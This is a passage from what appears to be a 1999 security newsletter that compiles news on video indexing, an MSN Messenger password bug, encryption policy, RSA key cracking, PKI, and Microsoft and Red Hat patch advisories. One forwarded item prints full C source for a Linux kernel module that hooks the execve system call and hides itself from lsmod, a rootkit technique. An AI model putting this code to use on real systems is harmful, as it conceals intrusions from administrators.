Beyond news analysis, other TV uses of the software are digitising and
indexing archives, adapting news for the web, and tracking newscasts of rival
TV networks (being piloted in the US by Fox News and TimeWarner).
Mark Juliano, Islip's chief executive, says internet-based searchable television
is now a technical reality, with real-time searchable TV around the corner.
"This would allow any wired home or business user to search for topics of
interest on all channels currently broadcasting, as well as in stored
programming," he says.
Outside the TV industry, investment banks such as Goldman Sachs, Merrill
Lynch and Morgan Stanley are testing the software for monitoring any mention
of specific companies on financial news networks. The Harvard Business
School has digitised its study material, which students can search using
video analysis. General Motors is using the software to simplify searching
through several hundred hours of digitised focus group sessions.
The internet has fundamentally changed the model of searchable video,
according to John Zappa, Islip's vice-president of marketing. "Previously, video
cataloging, search and retrieval tools were aimed at a select group of media
companies," says Mr Zappa. "Now, any company can easily put their video
content on the internet."
The introduction of video analysis and indexing technology can certainly bring
benefits for business and consumer. But new technologies can have their
drawbacks too. The snooping scenario envisaged by Enemy of the State may
simply be a little late in its arrival.
Software that's got it taped
Virage's VideoLogger software is able to index video automatically and
simultaneously, to digitise multiple video formats, and output information to
any video application or database.
The latest version supports plug-in video analysis engines for real-time facial
and optical character recognition.
VideoLogger works with the company's AudioLogger real-time speech
recognition and speaker identification software. US-based Virage recently
demonstrated a consumer version of VideoLogger, which the company claims
will unlock the content of streaming video files on the internet.
International Business Machines has developed a News Archive system using
its DB2 Digital Library database technology. The Digital Library is used by
some of the world's largest media collections, such as the US Library of
Congress, the Vatican Library in Rome, the State Hermitage Museum in St
Petersburg, Russia, and the National Palace Museum in Taiwan.
The News Archive system lets users search video clips via precoded
parameters, such as clip date, subject name, producer, and location, or carry
out free-text searches of text notes and scripts. IBM's "query by image
content" allows a search for clips according to their shape and colour.
A spin-off from Carnegie-Mellon University in Pittsburgh, Pennsylvania, Islip
(Integrated Speech, Language, and Image Processed) Media has licensed the
technology base and software of the university's Informedia Digital Library
project. Islip's MediaSite system consists of several modules, including
creation and search tools.
Islip's MediaSite.net web site is a clearing-house for stock footage, news and
information, training and education video content, which users can search and
pay for via the web. Virage has recently launched a similar service, Virage
Interactive, as a hosted index of searchable video.
Excalibur Technologies' text searching software is used by many
organisations, including the two leading political parties in the UK.
The company, also US-based, has recently introduced its Excalibur
Screening Room video analysis system, and has teamed up with StorageTek,
the disc storage company, to provide large digital video repositories.
@HWA
60.0 Microsoft acknowledges software glitch that exposes e-mail passwords
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From: William Knowles <erehwon@kizmiaz.dis.org>
Microsoft acknowledges software glitch that exposes e-mail passwords
WASHINGTON (August 19, 1999 10:00 p.m. EDT http://www.nandotimes.com)
Microsoft Corp. said Thursday a bug in its new Internet chat software that
permits coworkers and others to see a person's e-mail password. It
promised to fix it by week's end.
The glitch in the company's new "MSN Messenger" software means that others
who have access to a person's computer could impersonate that person to
read and even send e-mail using his "Hotmail" account without anyone's
knowledge.
Microsoft said that even if customers delete their saved password and
enter it manually, it still becomes visible if another person types a
specific sequence of keystrokes on that computer.
Microsoft, whose software runs most of the world's personal computers,
promised to fix the problem by the end of Friday. The company said it was
made aware of the bug earlier this week.
Deanna Sanford, the product manager for MSN, said the bug's ill effects
were mitigated because a person must have physical access to the victim's
computer, meaning the problem will be worse in offices where coworkers
share machines than for home users.
"In a shared office environment, if you trust the people you work with,
this will probably never be an issue," Sanford said. But she said
Microsoft recommends protecting each computer with a password.
The problem was the latest embarrassment for Microsoft over its attempt to
capture part of the burgeoning market for Internet chat software,
currently dominated by America Online Inc.'s "Instant Messenger" software.
When Microsoft unveiled its chat software earlier this month, AOL
complained that Microsoft engineers had hacked into its proprietary
network to let MSN customers communicate with AOL's customers.
AOL successfully blocked Microsoft's software several times, but with each
attempt Microsoft redesigned its chat software to bypass AOL's blocking
attempts.
MSN Messenger customers currently can chat with people using AOL's
software, and Microsoft - in a bid for the moral high ground - announced
earlier this week it will release its software protocols so that other
companies can design software that interoperates with MSN.
The latest Microsoft bug occurs when customers use the software to check
their e-mail using Microsoft's popular Web-based "Hotmail" service. If a
person stops the resulting Internet page from loading and looks at the
underlying software code - which requires merely three clicks with the
mouse - the user's e-mail name and password are displayed in plain view.
Sanford said Microsoft will scramble the information in the upcoming
patched version using encryption technology.
ISN is sponsored by Security-Focus.COM
@HWA
61.0 U.S to seek new computer surveillance power
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From: William Knowles <erehwon@kizmiaz.dis.org>
U.S. To Seek Neew Computer Surveillance Power
http://dailynews.yahoo.com/h/nm/19990820/ts/technology_covert_2.html
WASHINGTON (Reuters) [8.20.99] - The Justice Department is seeking new
powers to break into private premises and disable security precautions on
personal computers as a prelude to a wiretap or further search, the
Washington Post reported Friday.
The department wanted to make it easier for law enforcement authorities to
get search warrants that would let them monitor suspects' computerized
records after break-ins, said the paper, citing documents and interviews
with Clinton administration officials.
``In a request set to go to Capitol Hill, Justice officials will ask
lawmakers to authorize covert action in response to the growing use of
software programs that encrypt, or scramble, computer files,'' the report
said. Such encryption makes computers inaccessible to anyone who lacks a
special code or ''key.''
Justice officials worry that such software ``is increasingly used as a
means to facilitate criminal activity, such as drug trafficking,
terrorism, white-collar crime and the distribution of child pornography,''
the Post quoted an Aug. 4 memo by the department as saying.
Under the proposed ``Cyberspace Electronic Security Act,'' investigators
armed with a sealed warrant could comb computers for passwords and install
devices that override encryption programs, the Post reported, citing the
Justice memo.
To pull information from a targeted computer, agents would still be
required to get additional authorization from a court, the paper said.
Justice officials were not immediately available for comment. The proposal
is the latest in a years-long tug-of-war between the government and
computer users who want to protect their privacy by encrypting documents.
[snip..]
ISN is sponsored by Security-Focus.COM
@HWA
62.0 Code cracker worries cryptographers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.newspage.com/cgi-bin/NA.GetStory?story=h0812161.902\&date=19990813\&level1=46510\&level2=46515\&level3=821
Code Cracker Worries Cryptographers
August 13, 1999
WORCESTER, MASS. - The Associated Press via NewsEdge Corporation : A
developer of one of the most widespread computer encryption systems said
Thursday he has designed a computer that could crack open a file encoded
using the most common form of data encryption in only a few days.
If built _ at an estimated cost of about $2 million _ such a computer
could jeopardize the privacy of the bulk of electronic commerce as
practiced today, according to cryptographers at the conference where the
design was shown.
Most highly sensitive military, banking and other data are protected by
stronger encryption keys beyond its reach. The commonly used weaker keys,
though, would become ``easy to break for large organizations,'' said
cryptographer Adi Shamir of the Weizmann Institute of Science in Rehovot,
Israel.
He developed both the new computer design and helped invent the widespread
coding system _ known as RSA public-key encryption _ that it attacks.
Shamir spoke at the opening of a two-day conference of more than 120
cryptography experts from around the world at Worcester Polytechnic
Institute.
Computer scientists said his work underscores the growing vulnerability of
the most commonly used short form of RSA keys, which consists of just 512
bits. The key _ a sequence of 1s and 0s, or bits _ unlocks the secret
coding of a computer transmission so it can be deciphered.
Shamir dubs his idea for the computer Twinkle, which stands for The
Weizmann Institute Key Locating Engine and also refers to the twinkle of
its light emitting diodes. The 6-by-6-inch optical computer would measure
the light from diodes to perform mathematical calculations solving 512-bit
RSA encryption keys faster than ever _ within two or three days. An effort
in February to solve shorter, easier 465-bit keys took hundreds of
computers and several months.
[snip..]
ISN is sponsored by Security-Focus.COM
@HWA
63.0 AntiOnline offers infosec website hosting
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Straight from a message from Antionlines mailing list;
AntiOnline is proud to announce its new "InfoSec Community". This community allows individuals with an interest in information security and technology to share their thoughts, information, and files with
others who have similar interests.
Here are some of the benefits of becoming and AntiOnline InfoSec Community Member:
* Start out with 5 free megs, Get free upgrades up to 100 megs as your site grows.
* Your address will be: http://www.AntiOnline.com/members/YOUR-NAME
* Your site will be indexed by AntiSearch which draws thousands of people a day who are looking for information related to information security.
* You can upload files you create on your computer directly to your site via a simple upload form.
* Simple web-based editors help you create a page even if you're not an HTML wiz.
* Each week AntiOnline will spotlight a community site on its main page. If chosen, this guarantees that your work will be seen by thousands of people in the information security industry!
* A great place to distribute documents and programs that you've written! Also a great place to stick a resume!
* Once your webpage is in place and attracting visitors, you can request a message board or guestbook to be hosted by AntiOnline.com for you, free of charge!
Visit The Following URL To Sign Up For Your Own Account!
http://www.AntiOnline.com/members/cgi-bin/new.cgi
------------------------------------------------------------------------------------
Get Your Free AntiOnline E-mail Account: http://www.AntiOnline.com/mail/
Keep An EYE On The Underground: http://www.AntiOnline.com/eye/
Learn To FIGHT-BACK against malicious hackers: http://www.AntiOnline.com/fight-back/
Search Security Sites: http://www.AntiSearch.com/
Exploits Sorted By OS: http://www.AntiCode.com/
------------------------------------------------------------------------------------
@HWA
64.0 PKI yesterday today and tomorrow
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PKI: Yesterday, Today, Tomorrow
A Hurwitz Group Exclusive Analysis
By Diana Kelley
August 23, 1999 - For the past three years or so the rallying cry from the
major PKI vendors has been, "This is the year of PKI!" While it's true that PKI has
made some significant inroads into organizations, most notably ScotiaBank in
Canada and the ANX PKI created by the US automobile industry, we are still some
distance from the "Year of PKI." In practice many companies have spent time and
effort prototyping PK-Islands, independent disconnected solutions that fail to
support true business to business applications. Frustrated by investments in time
and money with little visible return many organizations have temporarily halted PKI
work. What's caused this slowdown in adoption and is there a change in the
landscape that signals a new phase for PKI?
What is it?
PKI. It's a great buzzword, but what is it exactly? A large part of the confusion in the industry can be directly
correlated to a muddied perception of what PKI is and what it can do for business. PKI is shorthand for Public Key
Infrastucture. It is based on the concept of public key cryptography which uses a key pair, a public key and a private
key, to perform various cryptographic functions.
Public key cryptography differs from the more traditional symmetric key which uses the same keys for encryption and
decryption. Symmetric key cryptography is fast and efficient but has a major drawback, it requires that the parties find
a way to share the single key secretly in advance of the communication session. In a closed environment this is not a
difficult accomplishment, but when two parties are meeting for the first time in a public digital environment such as the
Internet it is almost impossible to arrange a convenient manner to exchange a secret key. By splitting up the
cryptographic functions between a public and a private key, public key cryptography enables parties that have never
met before to communicate in an encrypted manner.
How the Keys are Used
Security services provided by public keys include authentication and non-repudiation though the use of digital
signatures, and confidentiality of communication in transit. The public and private keys are linked mathematically but
one should not be capable of being derived from the other. If the private key could be derived from the public key it
would break the security of the system. In practice, the public key is available to the public, it can be sent on request
by the owner or stored in a central server. The private key should be kept secret by the owner, either on the holder's
hard drive or a device such as a smartcard.
Encrypted Communications
Public key cryptography can be used to encrypt a communication before sending it over untrusted networks, such as
the Internet. The sender encrypts the message using the recipient's public key. Depending on the distribution method
the sender could request the public key directly from the intended recipient, or look up the public key in an available
key repository. Upon receipt the recipient uses her private key to decrypt the data. Data that has been encrypted
using a public key can only be decrypted using the related private key. This technique can be extended to data that is
resides on hard drives as well to provide secure storage.
Digital Signatures
The other most common use of public key cryptogrpahy is to provide authentication and nonrepudiation using digital
signatures. A signature is created by creating a hash of the data and then encrypting this with the sender's private
key. The recipient performs the same hash function on the data to create a value. Using the sender's public key, the
recipient decrypts the digital signature to discover the sender's hash value of the message. If the two values match,
the recipient knows conclusively that the message has not been tampered with and that it was sent by someone in
possession of the sender's private key.
Components of PKI
The PKI itself is the set of protocols and systems used to manage and distribute the keys and certificates. There is no
single definition of what constitutes a PKI, although many organizations including the IETF (Internet Engineerng Task
Force), The Open Group, and NIST (National Institute of Standards and Technology) are working on various PKI related
standards. In general, most PKIs include a standard set of components as listed below.
Registration Authority (RA) - The trusted entity that certifies the identity of the user
Certification Authority (CA) - The trusted entity that issues public key certificates
Certificate Repository - The server or system where public key certificates are held
Certificates - The records that contain structured information about the owner including the owner's name, public key
and the name of the issuing authority. The current standard for public key certifcates is X.509v3.
Certificate Revocation Lists (CRLs) - The listing of revoked or suspended public key certificates.
What Happened?
After looking at public key cryptography a lot of companies thought, "Wow, this is really neat technology!" And they
were right. But even the most sophisticated technology in the world is of no use unless it can be applied directly to
the solution of a business/consumer problem. In the mad frenzy to become an Internet enabled e-Business many
companies rushed towards implementation of PKI without first taking the time to define their business requirements.
Without a clear business goal to build toward even the best technology in the world will fail to be successful.
Business Need vs. Media Hype
What, then are the business needs? Any organization that is planning to transform to an e-Business needs to answer
the following questions:
What is the business problem?
What are the available technologies to solve the problem?
What fits in best with our environment?
Specific requirements vary depending on the line of business, unique needs of the business units, and market-based
needs driven by industry. Within this spectrum, there are some basic e-Business needs that cut across most industries.
These include:
Availability to the global market for 24x7x365 selling and support
Rapid deployment to keep pace with the competition
Enhanced customer experience achieved using personalization technologies
Increased control over the supply chain to reduce inventory turn time
Privacy of communications
Non-repudiability of transactions
That's quite a long list and no single technology can provide answers to each one. Smart e-Businesses must select the
most appropriate technologies to solve each problem. In the case of PKI, it is extemely well suited to provide solutions
for the last two bullets, but does not directly provide an answer to the other e-Business issues.
Reality Sets In
When the media hype surrounding PKI broke hit the marketplace a few years ago there was a lot of misrepresentation
and promise surrounding what PKI could actually do. The combination of a mixed media message and a lack of defined
goals within business is one of the main reasons that many companies were disappointed with their early
implementations of PKI technology.
Creating a distributed, scalable PKI is not an easy task. This complexity has given rise to a number of factors that
have contributed to failed or stalled PKI implementations.
Lack of Interoperability
If companies don't want to find themselves stranded on their own PK-Island they need to plan to integrate with other
installations. This is easier said than done. X.509 certificates are not always interoperable and many of the PKI vendors
can not provide cross-certification and certificate validation cross-vendor.
Cost
A lack of standards exists in pricing schemes as well. Some vendors charge per certificate, others per number of users,
and others still by number of servers. The result is a confusing tangle, when it is finally sorted out most companies find
that the cost of the PKI will be much higher than originally expected.
Legacy Applications that aren't PK-enabled
Public key technology is great but it needs to be linked directly into an application to add business value. Legacy
systems and ERP applications are not enabled for PKI. Packaged application vendors are beginning to build in support
for PKI, but until now the only way to integrate certificates into the back office has been through an investment in
developer time and resources.
Scalability Issues
Because PKI is in its infancy there have not been a number of large distributed installations. Scalability of the CRLs
(Certificate Revocation Lists) is a concern for organizations that will deal with large numbers of revoked certificates.
Scalability and performance concerns include excessive time delays, high processing loads and need for additional
bandwidth.
Not Customer Centric
Private keys are pieces of code that need to be stored someplace. One of the biggest benefits to e-Business is the
ease of access and mobility. Using any available web browser people can check stock prices, read and write email, and
bank on-line from a variety of locations and systems. If a certificate is required for access then user mobility is limited
to the system where the certificate is stored. Smartcards are a possible solution to this dilemma but they are still too
limiting; the free Internet terminal at the airport doesn't have a smartcard reader, does it?
What Next?
If PKI implementations have been so difficult to deploy successfully up to now, what has changed that makes it right
for today's e-Business. One need look no further than ScotiaBank and the ANX PKI for answes. Both of these
implementations were well thought out implementations of PKI to solve a specific business problem. The abilities to
encrypt transactions between parties and provide non-repudiation services to consumers are cornerstones of
e-Business.
Already there have been some very successful uses for PKI in VPN implementations and for email. In the future as the
transformation to the e-Business paradigm progresses, the boundaries between internal and external networks will
disappear. In this newly open and interconnected world PKI has the opportunity to provide targeted business solutions
in a number of areas. As communications between applications and devices increase, look for and increase in
certificates that are issued to devices such as routers and firewalls to manage secure communications. Using the time
stamping feature contained in some PKIs, organizations can protect auditing and logging data and store it encrypted.
For high security sites, content could be protected on a page by page basis. And with the ascendence of Directory
Services in the enterprise organizations are discovering a central repository with a shared query language (LDAP) that
can be used to store and distribute certificates.
PKI has an imporant place in the future of e-Business. The trick is for companies to establish the business problem that
needs to be solved first and then match the PKI solution appropriately. When companies address a business need with
the right technology everybody wins.
Diana Kelley (dkelley@hurwitz.com) is a Senior Security Analyst at Hurwitz Group, Inc., (www.hurwitz.com) the
leading analyst and advisory firm focused on strategic e-Business applications. Hurwitz Group partners with clients to
enable their success in applying electronic business strategies for maximum growth and competitive advantage.
Related Links
General Sites
American Bar Association - Digital Signature Guidelines
The Ten Minute CEO Briefing on PKI, Digital Certificates, and Trust in Electronic Transactions - 5 Questions every
CEO should be able to answer
International Chamber of Commerce: General Usage for International Digitally Ensured Commerce
Government Sites
NIST PKI Technical Working Group
Federal PKI Steering Committee
Government of Canada's PKI
PKI Vendors & Standards
@HWA
65.0 Microsoft Advisory, double byte code page vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
Re-release of Patch for "Double Byte Code Page" Vulnerability
-------------------------------------------------------------
August 20, 1999
Issue
=====
Microsoft has identifed and corrected a regression error in the IIS 4.0
version of the previously-released patch for the "Double Byte Code Page"
vulnerability. The corrected patch has been re-released, and an updated
security bulletin is available at
http://www.microsoft.com/security/bulletins/ms99-022.asp.
Details
=======
Shortly after releasing the patch for the "Malformed HTTP Request Header"
vulnerability (http://www.microsoft.com/Security/Bulletins/ms99-029.asp),
Microsoft discovered a regression error in it. We investigated all
previously-released patches to determine whether any others were affected by
the error, and discovered that one other patch was affected -- the IIS 4.0
version of the patch for the "Double Byte Code Page" vulnerability. On
August 16, 1999, we re-released the patch for the "Malformed HTTP Request
Header" vulnerability, and today are re-releasing the patch for the "Double
Byte Code Page" vulnerability. We have verified that no other security
patches are affected by this vulnerability, and have corrected our code base
to eliminate the error from all future IIS 4.0 releases.
The regression error is completely unrelated to the vulnerabilities, and
does not change our diagnosis of either. The error occurs if the IIS log
file grows to a size that is an exact multiple of 64KB; if this happens, the
server will hang. The problem can be resolved by stopping the IIS service,
starting a new log file, and restarting the IIS service. The regression
error affected only IIS 4.0, and was introduced after Windows NT 4.0 Service
Pack 5.
How to Identify the Re-released Patches
=======================================
- The re-released patches for the "Double Byte Code Page" are
timestamped August 17, 1999. (Please note that the IIS 3.0 patches
were unaffected by the regression error, so they are still
timestamped June 24, 1999).
- The re-released patches for the "Malformed HTTP Request Header"
are timestamped August 12, 1999.
What Customers Should Do
========================
You do not need to take any action if ANY of the following apply to you:
- You are running IIS 3.0.
- You have not installed any IIS 4.0 patches released after
Windows NT 4.0 Service Pack 5.
- You have installed the re-released patch for the "Malformed HTTP
Request Header" vulnerability.
You need to take action if ALL of the following apply to you:
- You applied the original version of either the "Double Byte Code Page"
patch or the "Malformed HTTP Request Header" patch.
- You have not applied the re-released version of either patch.
If you need to take action, you should apply the re-released patches for
either the "Maformed HTTP Request Header" or "Double Byte Code Page"
vulnerabilities. Applying either of the patches will correct the error.
It's not necessary to "back out" either of the original patches; just
download the new version of either patch and install it.
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Technical Support is available at
http://support.microsoft.com/support/contact/default.asp.
---------------------------------------------------------------
THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS"
WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER
EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS
SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN
IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR
LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE
FOREGOING LIMITATION MAY NOT APPLY.
(c) 1999 Microsoft Corporation. All rights reserved. Terms of Use.
*******************************************************************
You have received this e-mail bulletin as a result of your registration
to the Microsoft Product Security Notification Service. You may
unsubscribe from this e-mail notification service at any time by sending
an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM
The subject line and message body are not used in processing the request,
and can be anything you like.
For more information on the Microsoft Security Notification Service
please visit http://www.microsoft.com/security/services/bulletin.asp. For
security-related information about Microsoft products, please visit the
Microsoft Security Advisor web site at http://www.microsoft.com/security.
@HWA
66.0 RHSA:Denial of service attack in in.telnetd
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------
Red Hat, Inc. Security Advisory
Synopsis: Denial of service attack in in.telnetd
Advisory ID: RHSA-1999:029-01
Issue date: 1999-08-19
Updated on:
Keywords: telnet telnetd
Cross references:
---------------------------------------------------------------------
1. Topic:
A denial of service attack has been fixed in in.telnetd.
2. Bug IDs fixed (http://developer.redhat.com/bugzilla/):
4560
3. Relevant releases/architectures:
Red Hat Linux 4.2, 5.2, 6.0, all architectures
4. Obsoleted by:
5. Conflicts with:
6. RPMs required:
Red Hat Linux 4.2:
Intel:
ftp://ftp.redhat.com/redhat/updates/4.2/i386/NetKit-B-0.09-11.i386.rpm
Alpha:
ftp://ftp.redhat.com/redhat/updates/4.2/alpha/NetKit-B-0.09-11.alpha.rpm
Sparc:
ftp://ftp.redhat.com/redhat/updates/4.2/sparc/NetKit-B-0.09-11.sparc.rpm
Source packages:
ftp
://ftp.redhat.com/redhat/updates/4.2/SRPMS/NetKit-B-0.09-11.src.rpm
Red Hat Linux 5.2:
Intel:
ftp://ftp.redhat.com/redhat/updates/5.2/i386/telnet-0.10-28.5.2.i386.rpm
Alpha:
ftp://ftp.redhat.com/redhat/updates/5.2/alpha/telnet-0.10-28.5.2.alpha.rpm
Sparc:
ftp://ftp.redhat.com/redhat/updates/5.2/sparc/telnet-0.10-28.5.2.sparc.rpm
Source packages:
ftp://ftp.redhat.com/redhat/updates/5.2/SRPMS/telnet-0.10-28.5.2.src.rpm
Red Hat Linux 6.0:
Intel:
ftp://ftp.redhat.com/redhat/updates/6.0/i386/telnet-0.10-29.i386.rpm
Alpha:
ftp://ftp.redhat.com/redhat/updates/6.0/alpha/telnet-0.10-29.alpha.rpm
Sparc:
ftp://ftp.redhat.com/redhat/updates/6.0/sparc/telnet-0.10-29.sparc.rpm
Source packages:
ftp://ftp.redhat.com/redhat/updates/6.0/SRPMS/telnet-0.10-29.src.rpm
7. Problem description:
in.telnetd attempts to negotiate a compatible terminal type
between the local and remote host. By setting the TERM
environment variable before connecting, a remote user could
cause the system telnetd to open files it should not. Depending
on the TERM setting used, this could lead to denial of service
attacks.
Thanks go to Michal Zalewski and the Linux Security Audit team
for noting this vulnerability.
8. Solution:
For each RPM for your particular architecture, run:
rpm -Uvh <filename>
where filename is the name of the RPM.
9. Verification:
MD5 sum Package Name
--------------------------------------------------------------------------
0c425c34fb77a8309ff10b4143e9b847 i386/NetKit-B-0.09-11.i386.rpm
d791d645adeb5fa0147c1058b21cbbac alpha/NetKit-B-0.09-11.alpha.rpm
bfbd440845191bbdcf8be21ee59bf6a8 sparc/NetKit-B-0.09-11.sparc.rpm
ccd5ab53c423e468d66ca801c90b5ae4 SRPMS/NetKit-B-0.09-11.src.rpm
ef33f3c5ca810d05420e57b5cfcf8928 i386/telnet-0.10-28.5.2.i386.rpm
6dc23437a200193b0bfed23d5f5e6562 alpha/telnet-0.10-28.5.2.alpha.rpm
49c38457cc0a82a680fd9b9634dc8021 sparc/telnet-0.10-28.5.2.sparc.rpm
2f33670a683e3abef0e4914586c71961 SRPMS/telnet-0.10-28.5.2.src.rpm
4360d47490f13d60b8737d28dc88825a i386/telnet-0.10-29.i386.rpm
90213fcdca41a3ed12ab7d92344e7286 alpha/telnet-0.10-29.alpha.rpm
277787dbc39dff8ea84d4b16dcb7a954 sparc/telnet-0.10-29.sparc.rpm
269783a0754d234f7bef0f4717a8dbc2 SRPMS/telnet-0.10-29.src.rpm
These packages are PGP signed by Red Hat Inc. for security. Our key
is available at:
http://www.redhat.com/corp/contact.html
You can verify each package with the following command:
rpm --checksig <filename>
If you only wish to verify that each package has not been corrupted or
tampered with, examine only the md5sum with the following command:
rpm --checksig --nopgp <filename>
10. References:
@HWA
67.0 [EuroHaCk] stealth-code
~~~~~~~~~~~~~~~~~~~~~~~
---------- Forwarded message ----------
Date: Wed, 18 Aug 1999 18:56:09 +0200
From: Martin Markovitz <stealth@dione.ids.pl>
Reply-To: eurohack@bofh.kyrnet.kg
To: coders@dione.ids.pl
Subject: [EuroHaCk] stealth-code
hi,
don't think that hiding modules is an old topic. ;-)
since all the other dirty tricks didn't work on 2.2
kernel (as using asm-code etc.) i used new
techniqe to hide modules. example-code below.
payload is simly print-out-message-at-execution-call
thingie.
this module even is stealth enuff ;-) for my radar.c
module-detector.
any other suggestions are welcome.
cheers,
Stealth
: ---- main(){fork();main();} ----
: Hi! I'm a .signature virus! Copy me into your ~/.signature, please!
: Stealth <-> http://www.kalug.lug.net/stealth
/*** A kernel-module for 2.2 kernels, hiding itself.
*** It was easier in 2.0 kernels and i found all the old
*** techniqes not to work. So i invented new one. ;-)
*** (C) 1999/2000 by Stealth.
*** All under the GPL. SO YOU USE IT AT YOUR OWN RISK.
*** http://www.kalug.lug.net/stealth
***
*** Greets to all my friends, you know who you are.
***/
#define __KERNEL__
#define MODULE
#include <linux/module.h>
#include <linux/kernel.h>
#include <sys/syscall.h>
#include <linux/unistd.h>
#include <linux/sched.h>
#include <asm/uaccess.h>
#include <linux/mm.h>
#include <linux/smp_lock.h>
#ifndef NULL
#define NULL ((void*)0)
#endif
extern void *sys_call_table[];
int (*old_exec)(struct pt_regs regs);
int new_exec(struct pt_regs regs)
{
int error = 0;
char *filename;
lock_kernel();
filename = getname((char*)regs.ebx);
error = PTR_ERR(filename);
if (IS_ERR(error))
goto out;
printk("Hi, the hook is still installed. ;-)\n");
error = do_execve(filename, (char**)regs.ecx, (char**)regs.edx, ®s);
putname(filename);
out:
unlock_kernel();
return error;
}
int init_module()
{
int i = 0;
struct module *m = &__this_module, *lastm = NULL,
*to_delete = NULL;
EXPORT_NO_SYMBOLS;
/* install hook */
old_exec = sys_call_table[__NR_execve];
sys_call_table[__NR_execve] = new_exec;
/* get next module-struct */
to_delete = m->next;
if (!to_delete) {
printk("No module found for exchange }|-(\n");
return 0;
}
/* and steal all information about it */
m->name = to_delete->name;
m->size = to_delete->size;
m->flags = to_delete->flags;
/* even set the right USE_COUNT */
for (i = 0; i < GET_USE_COUNT(to_delete); i++)
MOD_INC_USE_COUNT;
/* and drop the attacked module from the list
* this won't delete it but makes it disapear for lsmod
*/
m->next = to_delete->next;
printk("The following modules are visible now:\n");
while (m) {
printk("%s\n", m->name);
m = m->next;
}
printk("Tzzz... (sleeping)\n");
return 0;
}
int cleanup_module()
{
sys_call_table[__NR_execve] = old_exec;
return 0;
}
@HWA
68.0 RHSA;Buffer overflow in libtermcap tgetent()
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------
Red Hat, Inc. Security Advisory
Synopsis: Buffer overflow in libtermcap tgetent()
Advisory ID: RHSA-1999:028-01
Issue date: 1999-08-17
Updated on:
Keywords: termcap xterm
Cross references:
---------------------------------------------------------------------
1. Topic:
A buffer overflow has been fixed in the tgetent() function of
libtermcap.
2. Bug IDs fixed (http://developer.redhat.com/bugzilla/):
4538
3. Relevant releases/architectures:
Red Hat Linux 4.2, 5.2, 6.0, all architectures
4. Obsoleted by:
5. Conflicts with:
6. RPMs required:
Red Hat Linux 4.2:
Intel:
ftp://ftp.redhat.com/redhat/updates/4.2/i386/libtermcap-2.0.8-14.4.2.i386.rpm
ftp://ftp.redhat.com/redhat/updates/4.2/i386/libtermcap-devel-2.0.8-14.4.2.i386.rpm
Alpha:
ftp://ftp.redhat.com/redhat/updates/4.2/alpha/libtermcap-2.0.8-14.4.2.alpha.rpm
ftp://ftp.redhat.com/redhat/updates/4.2/alpha/libtermcap-devel-2.0.8-14.4.2.alpha.rpm
Sparc:
ftp://ftp.redhat.com/redhat/updates/4.2/sparc/libtermcap-2.0.8-14.4.2.sparc.rpm
ftp://ftp.redhat.com/redhat/updates/4.2/sparc/libtermcap-devel-2.0.8-14.4.2.sparc.rpm
Source packages:
ftp://ftp.redhat.com/redhat/updates/4.2/SRPMS/libtermcap-2.0.8-14.4.2.src.rpm
Red Hat Linux 5.2:
Intel:
ftp://ftp.redhat.com/redhat/updates/5.2/i386/libtermcap-2.0.8-14.5.2.i386.rpm
ftp://ftp.redhat.com/redhat/updates/5.2/i386/libtermcap-devel-2.0.8-14.5.2.i386.rpm
Alpha:
ftp://ftp.redhat.com/redhat/updates/5.2/alpha/libtermcap-2.0.8-14.5.2.alpha.rpm
ftp://ftp.redhat.com/redhat/updates/5.2/alpha/libtermcap-devel-2.0.8-14.5.2.alpha.rpm
Sparc:
ftp://ftp.redhat.com/redhat/updates/5.2/sparc/libtermcap-2.0.8-14.5.2.sparc.rpm
ftp://ftp.redhat.com/redhat/updates/5.2/sparc/libtermcap-devel-2.0.8-14.5.2.sparc.rpm
Source packages:
ftp://ftp.redhat.com/redhat/updates/5.2/SRPMS/libtermcap-2.0.8-14.5.2.src.rpm
Red Hat Linux 6.0:
Intel:
ftp://ftp.redhat.com/redhat/updates/6.0/i386/libtermcap-2.0.8-15.i386.rpm
ftp://ftp.redhat.com/redhat/updates/6.0/i386/libtermcap-devel-2.0.8-15.i386.rpm
Alpha:
ftp://ftp.redhat.com/redhat/updates/6.0/alpha/libtermcap-2.0.8-15.alpha.rpm
ftp://ftp.redhat.com/redhat/updates/6.0/alpha/libtermcap-devel-2.0.8-15.alpha.rpm
Sparc:
ftp://ftp.redhat.com/redhat/updates/6.0/sparc/libtermcap-2.0.8-15.sparc.rpm
ftp://ftp.redhat.com/redhat/updates/6.0/sparc/libtermcap-devel-2.0.8-15.sparc.rpm
Source packages:
ftp://ftp.redhat.com/redhat/updates/6.0/SRPMS/libtermcap-2.0.8-15.src.rpm
7. Problem description:
A buffer overflow existed in libtermcap's tgetent() function,
which could cause the user to execute arbitrary code if they
were able to supply their own termcap file.
